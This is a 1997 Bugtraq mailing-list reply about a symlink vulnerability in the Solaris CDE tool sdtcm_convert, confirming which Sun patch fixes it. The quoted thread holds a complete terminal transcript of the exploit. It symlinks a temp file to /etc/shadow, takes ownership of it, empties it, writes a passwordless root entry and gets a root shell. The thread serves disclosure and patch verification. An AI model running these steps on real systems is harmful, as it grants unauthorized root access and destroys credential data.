[4088] in bugtraq
Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit
daemon@ATHENA.MIT.EDU (Brian Parent)
Mon Feb 24 20:39:11 1997
Date: Mon, 24 Feb 1997 15:28:52 -0800
Reply-To: Brian Parent <bparent@CALVIN.UCSD.EDU>
From: Brian Parent <bparent@CALVIN.UCSD.EDU>
X-To: shuque@SAS.UPENN.EDU
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <199702232040.PAA27325@orion.sas.upenn.edu> from Shumon Huque at
"Feb 23, 97 03:40:43 pm"
I was able to confirm that both bugs were present in CDE 1.0.2,
and that both were patched successfully with 103670-02.
I'm running 2.5.1.
The two bugs I'm referring to are the one outlined by
Cristian Schipor - Computer Science Faculty - Bucharest - Romania
(using /usr/spool/calendar/callog.USER -> /etc/shadow)
as well as the one outlined by Adam Morrison (using /tmp/calorig.USER ->
/etc/shadow).
Re:
> Date: Sun, 23 Feb 1997 15:40:43 -0500
> From: Shumon Huque <shuque@SAS.UPENN.EDU>
> Subject: Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit
> To: BUGTRAQ@NETSPACE.ORG
> In-Reply-To: <199702231045.MAA00882@lune.math.tau.ac.il> from "Adam Morrison"
> at Feb 23, 97 12:45:40 pm
>
> I don't know what exactly 103670-02 fixed but this exploit didn't work
> on my machine - 2.5.1, CDE 1.0.2 with 103670-02 applied. The symlink
> /tmp/calorig.user was removed and replaced by a plain file owned
> by user.
>
> >
> > > Is this the bug fixed in the Sun patches:
> > > 103670-02: CDE 1.0.2: sdtcm_convert has a security vulnerability
> > > 103671-02: CDE 1.0.1: sdtcm_convert has a security vulnerability
> > > 103717-02: CDE 1.0.2: sdtcm_convert has a security vulnerability (x86 version)
> > > 103718-02: CDE 1.0.1: sdtcm_convert has a security vulnerability (x86 version)
> > > or is it a new one?
> >
> > That's hard to know, since this patch is not publicly available off
> > SunSolve (not right now, anyway).
> >
> > There's at least one other hole in sdtcm_convert which this patch may or not
> > fix.
> >
> > CDE is generally a can of worms.
> >
> >
> > $Id: sdtcm_convert,v 1.1 1996/07/14 17:44:54 adam Exp $
> >
> > Script started on Thu Jul 11 22:15:03 1996
> > 22:15 [wumpus:~] % whoami
> > adam
> > 22:15 [wumpus:~] % ls -l /etc/shadow
> > -r-------- 1 root sys 291 Jul 11 22:14 /etc/shadow
> > 22:15 [wumpus:~] % ln -s /etc/shadow /tmp/calorig.adam
> > 22:15 [wumpus:~] % /usr/dt/bin/sdtcm_convert -d /tmp -v 3 adam
> > Loading the calendar ...
> >
> > WARNING!! Data will be lost when converting version 4 data format
> > back to version 3 data format.
> >
> > Do you want to continue? (Y/N) [Y] y
> >
> > Doing conversion ...
> > Writing out new file ...
> > Conversion done successfully.
> > Total number of appointments = 0
> > Number of one-time appointments converted = 0
> > Number of repeating appointments converted = 0
> > Number of one-time appointments pruned = 0
> > Number of repeating appointments pruned = 0
> > The original file is saved in /tmp/calorig.adam
> > 22:15 [wumpus:~] % ls -l /etc/shadow
> > -r--rw---- 1 adam daemon 3114 Jul 11 22:15 /etc/shadow
> > 22:15 [wumpus:~] % chmod 644 /etc/shadow
> > 22:15 [wumpus:~] % cp /dev/null /etc/shadow
> > cp: overwrite /etc/shadow (y/n)? y
> > 22:15 [wumpus:~] % ls -l /etc/shadow
> > -rw-r--r-- 1 adam daemon 0 Jul 11 22:15 /etc/shadow
> > 22:15 [wumpus:~] % echo "root::6445::::::" >> /etc/shadow
> > 22:16 [wumpus:~] % su
> > # id
> > uid=0(root) gid=1(other)
> > # exit
> >
> > script done on Thu Jul 11 22:16:21 1996
> >
> >
> >
> > adam?
> >
>
